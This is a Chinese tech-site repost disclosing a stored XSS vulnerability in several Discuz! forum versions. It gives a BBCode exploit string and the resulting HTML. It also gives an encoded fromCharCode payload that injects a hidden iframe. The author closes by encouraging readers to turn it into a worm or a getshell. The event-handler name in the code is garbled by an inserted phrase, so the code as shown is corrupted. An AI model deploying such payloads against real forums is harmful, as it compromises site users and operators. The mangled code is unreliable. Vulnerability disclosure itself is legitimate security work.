• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

Discuz!多版本爆存储型XSS漏洞

武飞扬头像
51CTO
帮助0

XSS漏洞的测试案例分析如下:

2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年Discuz不断的更新版本,但此XSS漏洞依然存在。

在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。当时我们一起测试的是Discuz6.0-Discuz7.2,不知道是不是通杀啊。没有一个一个去测试。有条件的去测试一下吧。

发贴进入源码模式,写入如下的exp

  1. [email][url][img]http://www.linuxso.com onmouSEO((Search Engine Optimization))ver=alert(/DZ-xss-0day/); [/img] [/url][/email] 

上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!

附上XSS完的源码如下:

  1. <a href="mailto:"></a><a href="\"http://qhkest.com" onmouSEO((Search Engine Optimization))ver="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com onmouSEO((Search Engine Optimization))ver=alert(/DZ-xss-0day/);" onload="thumbImg(this)" alt=""> </a>< 

我想你们一看就明白了吧!

漏洞证明:

本地测试结果:

Discuz! X2

学新通

以下应用华东耶稣的话:鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的嘛。

把上面的alert(/DZ-XSS-0DAY/)换成

  1. eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,  
  2.  
  3. 121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,  
  4.  
  5. 101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,  
  6.  
  7. 34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,  
  8.  
  9. 102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,  
  10.  
  11. 48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,  
  12.  
  13. 84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,  
  14.  
  15. 105,108,100,40,102,41,59)) 

学新通

鼠标触碰效果:

学新通

加密过程,就是10进制加密啦,如图。

学新通

解密下看下代码。

学新通

好了,希望看完的朋友能写出个蠕虫,或者写个直接getshell的东西。我记得曾经有人写过dz的xss直接getshell的。

Discuz和多版本爆存储型XSS漏洞的介绍就结束了,有兴趣的朋友请继关注此类资源。

【编辑推荐】

  1. CC攻击的思路及防范方法
  2. DDoS攻击原理及防护方法论
  3. 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
  4. 如何在php中修补XSS漏洞
  5. DISCUZ!昨日遭攻击 “邪恶八进制”有嫌疑

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /news/detail/tanhccieeg
系列文章
更多 icon
同类精品
更多 icon
继续加载